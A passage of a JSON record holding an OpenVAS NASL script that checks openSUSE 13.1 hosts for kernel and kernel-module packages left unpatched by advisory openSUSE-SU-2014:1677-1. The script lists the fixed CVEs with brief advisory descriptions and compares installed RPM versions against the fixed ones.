"http://plugins.openvas.org/nasl.php?oid=1361412562310850628", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2014:1677-1)", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in 
the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850628\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-12-22 05:56:12 +0100 (Mon, 22 Dec 2014)\");\n script_cve_id(\"CVE-2013-2891\", \"CVE-2013-2898\", \"CVE-2014-0181\", \"CVE-2014-0206\",\n \"CVE-2014-1739\", \"CVE-2014-3181\", \"CVE-2014-3182\", \"CVE-2014-3184\",\n \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-3673\", \"CVE-2014-3687\",\n \"CVE-2014-3688\", \"CVE-2014-4171\", \"CVE-2014-4508\", \"CVE-2014-4608\",\n \"CVE-2014-4611\", \"CVE-2014-4943\", \"CVE-2014-5077\", \"CVE-2014-5206\",\n \"CVE-2014-5207\", \"CVE-2014-5471\", \"CVE-2014-5472\", \"CVE-2014-6410\",\n \"CVE-2014-7826\", \"CVE-2014-7841\", \"CVE-2014-7975\", \"CVE-2014-8133\",\n \"CVE-2014-8709\", \"CVE-2014-9090\", \"CVE-2014-9322\", \"CVE-2014-8884\",\n \"CVE-2014-4715\", \"CVE-2013-7263\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2014:1677-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE 13.1 kernel was updated to fix security issues and 
bugs:\n\n Security issues fixed: CVE-2014-9322: A local privilege escalation in the\n x86_64 32bit compatibility signal handling was fixed, which could be used\n by local attackers to crash the machine or execute code.\n\n CVE-2014-9090: The do_double_fault function in arch/x86/kernel/traps.c in\n the Linux kernel did not properly handle faults associated with the Stack\n Segment (SS) segment register, which allowed local users to cause a denial\n of service (panic) via a modify_ldt system call, as demonstrated by\n sigreturn_32 in the linux-clock-tests test suite.\n\n CVE-2014-8133: Insufficient validation of TLS register usage could leak\n information from the kernel stack to userspace.\n\n CVE-2014-0181: The Netlink implementation in the Linux kernel through\n 3.14.1 did not provide a mechanism for authorizing socket operations based\n on the opener of a socket, which allowed local users to bypass intended\n access restrictions and modify network configurations by using a Netlink\n socket for the (1) stdout or (2) stderr of a setuid program. 
(bsc#875051)\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on 32-bit\n x86 platforms, when syscall auditing is enabled and the sep CPU feature\n flag is set, allowed local users to cause a denial of service (OOPS and\n system crash) via an invalid syscall number, as demonstrated by number\n 1000.\n\n CVE-2014-3688: The SCTP implementation in the Linux kernel allowed remote\n attackers to cause a denial of service (memory consumption) by triggering\n a large number of chunks in an association's output queue, as demonstrated\n by ASCONF probes, related to net/sctp/inqueue.c and\n net/sctp/sm_statefuns.c.\n\n CVE-2014-3687: The sctp_assoc_lookup_asconf_ack function in\n net/sctp/associola.c in the SCTP implementation in the Linux kernel\n allowed remote attackers to cause a denial of service (panic) via\n duplicate ASCONF chunks that trigger an incorrect uncork within the\n side-effect interpreter.\n\n CVE-2014-7975: The do_umount function in fs/namespace.c in the Linux\n kernel did not require the CAP_SYS_ADMIN capability for do_remount_sb\n calls that change the root filesystem to read-only, which allowed local\n users to cause a denial of service (loss of writability) by making certain\n unshare system calls, clearing the / MNT_LOCKED flag, and making an\n MNT_FORCE umount system call.\n\n CVE-2014-8884: Stack-based buffer overflow in the\n ttusbdecfe_dvbs_diseqc_send_master_cmd function in\n drivers/media/usb/ttusb-dec/ttusbdecfe.c in the Linux kernel allowed local\n users to c ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"kernel on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:1677-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report 
+= res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel-debuginfo\", rpm:\"kernel-desktop-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel-debuginfo\", rpm:\"kernel-ec2-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res 
= isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel-debuginfo\", rpm:\"kernel-trace-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel-debuginfo\", rpm:\"kernel-vanilla-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop\", rpm:\"cloop~2.639~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-debuginfo\", rpm:\"cloop-debuginfo~2.639~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-debugsource\", rpm:\"cloop-debugsource~2.639~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-default\", rpm:\"cloop-kmp-default~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-default-debuginfo\", rpm:\"cloop-kmp-default-debuginfo~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-desktop\", rpm:\"cloop-kmp-desktop~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-desktop-debuginfo\", rpm:\"cloop-kmp-desktop-debuginfo~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-xen\", rpm:\"cloop-kmp-xen~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-xen-debuginfo\", rpm:\"cloop-kmp-xen-debuginfo~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report 
+= res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash\", rpm:\"crash~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-debuginfo\", rpm:\"crash-debuginfo~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-debugsource\", rpm:\"crash-debugsource~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-devel\", rpm:\"crash-devel~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-doc\", rpm:\"crash-doc~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-eppic\", rpm:\"crash-eppic~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-eppic-debuginfo\", rpm:\"crash-eppic-debuginfo~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-gcore\", rpm:\"crash-gcore~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-gcore-debuginfo\", rpm:\"crash-gcore-debuginfo~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-default\", rpm:\"crash-kmp-default~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-default-debuginfo\", rpm:\"crash-kmp-default-debuginfo~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-desktop\", rpm:\"crash-kmp-desktop~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-desktop-debuginfo\", rpm:\"crash-kmp-desktop-debuginfo~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-xen\", 
rpm:\"crash-kmp-xen~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-xen-debuginfo\", rpm:\"crash-kmp-xen-debuginfo~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-debugsource\", rpm:\"hdjmod-debugsource~1.28~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-default\", rpm:\"hdjmod-kmp-default~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-default-debuginfo\", rpm:\"hdjmod-kmp-default-debuginfo~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-desktop\", rpm:\"hdjmod-kmp-desktop~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-desktop-debuginfo\", rpm:\"hdjmod-kmp-desktop-debuginfo~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen\", rpm:\"hdjmod-kmp-xen~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen-debuginfo\", rpm:\"hdjmod-kmp-xen-debuginfo~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset\", rpm:\"ipset~6.21.1~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debuginfo\", rpm:\"ipset-debuginfo~6.21.1~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debugsource\", rpm:\"ipset-debugsource~6.21.1~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-devel\", rpm:\"ipset-devel~6.21.1~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"ipset-kmp-default\", rpm:\"ipset-kmp-default~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-default-debuginfo\", rpm:\"ipset-kmp-default-debuginfo~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-desktop\", rpm:\"ipset-kmp-desktop~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-desktop-debuginfo\", rpm:\"ipset-kmp-desktop-debuginfo~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-xen\", rpm:\"ipset-kmp-xen~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-xen-debuginfo\", rpm:\"ipset-kmp-xen-debuginfo~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget\", rpm:\"iscsitarget~1.4.20.3~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-debuginfo\", rpm:\"iscsitarget-debuginfo~1.4.20.3~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-debugsource\", rpm:\"iscsitarget-debugsource~1.4.20.3~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-default\", rpm:\"iscsitarget-kmp-default~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-default-debuginfo\", rpm:\"iscsitarget-kmp-default-debuginfo~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-desktop\", rpm:\"iscsitarget-kmp-desktop~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"iscsitarget-kmp-desktop-debuginfo\", rpm:\"iscsitarget-kmp-desktop-debuginfo~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-xen\", rpm:\"iscsitarget-kmp-xen~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-xen-debuginfo\", rpm:\"iscsitarget-kmp-xen-debuginfo~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3\", rpm:\"libipset3~6.21.1~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3-debuginfo\", rpm:\"libipset3-debuginfo~6.21.1~2.20.1\", 
rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper\", rpm:\"ndiswrapper~1.58~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-debuginfo\", rpm:\"ndiswrapper-debuginfo~1.58~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-debugsource\", rpm:\"ndiswrapper-debugsource~1.58~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-default\", rpm:\"ndiswrapper-kmp-default~1.58_k3.11.10_25~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-default-debuginfo\", rpm:\"ndiswrapper-kmp-default-debuginfo~1.58_k3.11.10_25~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-desktop\", rpm:\"ndiswrapper-kmp-desktop~1.58_k3.11.10_25~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-desktop-debuginfo\", rpm:\"ndiswrapper-kmp-desktop-debuginfo~1.58_k3.11.10_25~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock\", rpm:\"pcfclock~0.44~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debuginfo\", rpm:\"pcfclock-debuginfo~0.44~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debugsource\", rpm:\"pcfclock-debugsource~0.44~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default\", rpm:\"pcfclock-kmp-default~0.44_k3.11.10_25~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default-debuginfo\", rpm:\"pcfclock-kmp-default-debuginfo~0.44_k3.11.10_25~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"pcfclock-kmp-desktop\", rpm:\"pcfclock-kmp-desktop~0.44_k3.11.10_25~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-desktop-debuginfo\", rpm:\"pcfclock-kmp-desktop-debuginfo~0.44_k3.11.10_25~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox\", rpm:\"python-virtualbox~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox-debuginfo\", rpm:\"python-virtualbox-debuginfo~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-debugsource\", rpm:\"vhba-kmp-debugsource~20130607~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default\", rpm:\"vhba-kmp-default~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default-debuginfo\", rpm:\"vhba-kmp-default-debuginfo~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-desktop\", rpm:\"vhba-kmp-desktop~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-desktop-debuginfo\", 